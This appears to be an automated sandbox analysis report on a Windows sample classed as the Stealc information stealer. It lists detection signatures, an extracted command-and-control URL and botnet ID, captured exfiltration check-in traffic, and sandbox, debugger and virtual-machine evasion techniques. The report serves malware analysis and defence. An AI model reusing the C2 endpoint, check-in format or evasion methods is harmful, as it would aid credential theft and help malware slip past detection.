Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1541560
MD5:4af633ceed4aacaf057ea12772b50ad2
SHA1:2fc5349b3cf3153eb303ec63dae8f9fa53f62909
SHA256:d88360912930f05dad8b9dabaee2ee7a32d568d39566d0b1ef487be6225edefc
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7628 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 4AF633CEED4AACAF057EA12772B50AD2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1796107974.000000000180E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1754683786.00000000056C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7628JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7628JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.d80000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-25T00:19:17.598711+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.d80000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00D8C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D89AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00D89AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D87240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00D87240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D89B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00D89B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D98EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00D98EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00D938B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D94910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D94910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00D8DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00D8E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D94570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00D94570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00D8ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D816D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D8F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D93EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00D93EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00D8BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D8DE10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBKEHJJDAAAAKECBGHDAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 45 46 35 31 31 32 37 43 37 35 33 37 39 39 36 32 31 31 36 35 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 2d 2d 0d 0a Data Ascii: ------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="hwid"5FEF51127C753799621165------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="build"doma------EBKEHJJDAAAAKECBGHDA--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D84880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00D84880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBKEHJJDAAAAKECBGHDAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 45 46 35 31 31 32 37 43 37 35 33 37 39 39 36 32 31 31 36 35 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 2d 2d 0d 0a Data Ascii: ------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="hwid"5FEF51127C753799621165------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="build"doma------EBKEHJJDAAAAKECBGHDA--
                Source: file.exe, 00000000.00000002.1796107974.000000000180E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1796107974.0000000001867000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1796107974.0000000001852000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1796107974.000000000180E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1796107974.0000000001867000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1796107974.0000000001886000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1796107974.0000000001852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1796107974.0000000001867000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpDEd
                Source: file.exe, 00000000.00000002.1796107974.000000000180E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpI
                Source: file.exe, 00000000.00000002.1796107974.0000000001852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpi
                Source: file.exe, 00000000.00000002.1796107974.0000000001867000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpzEV
                Source: file.exe, 00000000.00000002.1796107974.0000000001867000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/es
                Source: file.exe, 00000000.00000002.1796107974.0000000001867000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/sEO
                Source: file.exe, 00000000.00000002.1796107974.000000000180E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37R4

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106297C0_2_0106297C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011419E40_2_011419E4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011558B20_2_011558B2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0114D3D10_2_0114D3D1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01146A110_2_01146A11
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0115427F0_2_0115427F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0113CA610_2_0113CA61
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0113EAB90_2_0113EAB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011485640_2_01148564
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01091DA50_2_01091DA5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01197C3F0_2_01197C3F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011434420_2_01143442
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011044C50_2_011044C5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010864D00_2_010864D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011524CE0_2_011524CE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010B57020_2_010B5702
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01144F680_2_01144F68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEEE1B0_2_00FEEE1B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0114EE370_2_0114EE37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0114C6380_2_0114C638
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00D845C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: igioonnz ZLIB complexity 0.9951144939472878
                Source: file.exe, 00000000.00000003.1754683786.00000000056C0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D98680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00D98680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D93720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00D93720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\O08ND1U9.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1826816 > 1048576
                Source: file.exeStatic PE information: Raw size of igioonnz is bigger than: 0x100000 < 0x197e00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.d80000.0.unpack :EW;.rsrc :W;.idata :W; :EW;igioonnz:EW;dimpkies:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;igioonnz:EW;dimpkies:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D99860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00D99860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1be7d6 should be: 0x1ccc8f
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: igioonnz
                Source: file.exeStatic PE information: section name: dimpkies
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0123236E push ecx; mov dword ptr [esp], ebx0_2_01232F4E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01169901 push 67EB54E3h; mov dword ptr [esp], edi0_2_0116A427
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE48BD push 6A1EB33Eh; mov dword ptr [esp], esi0_2_00FE8800
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01034946 push edx; mov dword ptr [esp], ecx0_2_01034978
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01034946 push eax; mov dword ptr [esp], esp0_2_0103497C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01034946 push 3A5A2D81h; mov dword ptr [esp], ecx0_2_010349A7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01034946 push ebx; mov dword ptr [esp], edi0_2_01034A5C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01034946 push 48570159h; mov dword ptr [esp], eax0_2_01034AED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EC146 push edx; mov dword ptr [esp], 57CF5B96h0_2_011EC165
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106297C push edx; mov dword ptr [esp], eax0_2_010629E5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106297C push ebx; mov dword ptr [esp], edx0_2_01062A09
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106297C push 3597BE96h; mov dword ptr [esp], esi0_2_01062A18
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106297C push ebp; mov dword ptr [esp], 0F825563h0_2_01062A68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106297C push eax; mov dword ptr [esp], ebp0_2_01062B38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EF195 push 119675C3h; mov dword ptr [esp], esi0_2_011EF1D3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E31BE push ecx; mov dword ptr [esp], 57DFF332h0_2_011E31CF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E31BE push ecx; mov dword ptr [esp], 306F52DDh0_2_011E31FA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011F69B4 push eax; mov dword ptr [esp], edx0_2_011F69DA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011F69B4 push 59B523D7h; mov dword ptr [esp], ebx0_2_011F6A57
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011F69B4 push eax; mov dword ptr [esp], 4B9F2AC0h0_2_011F6A71
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011F69B4 push ebp; mov dword ptr [esp], ebx0_2_011F6AB5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011F69B4 push 750E01C1h; mov dword ptr [esp], eax0_2_011F6B79
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011F69B4 push ebx; mov dword ptr [esp], ebp0_2_011F6BCA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012319FB push ebp; mov dword ptr [esp], ebx0_2_01231A0F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012319FB push edx; mov dword ptr [esp], ebx0_2_01231A8C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0122D1C1 push esi; mov dword ptr [esp], edi0_2_0122D1CB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0122D1C1 push eax; mov dword ptr [esp], ebp0_2_0122D2E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0122D1C1 push ebx; mov dword ptr [esp], eax0_2_0122D308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0122D1C1 push ecx; mov dword ptr [esp], ebp0_2_0122D39B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0122D1C1 push 62687CABh; mov dword ptr [esp], ebx0_2_0122D3DA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012001C8 push 35CD25D7h; mov dword ptr [esp], ebp0_2_012000C5
                Source: file.exeStatic PE information: section name: igioonnz entropy: 7.9541328107459774

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D99860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00D99860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13719
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE1FB9 second address: FE1FDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94E4CBB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE1FDB second address: FE1FE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115A538 second address: 115A542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115A542 second address: 115A547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11598A4 second address: 11598A9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11598A9 second address: 11598B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11598B2 second address: 11598B8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
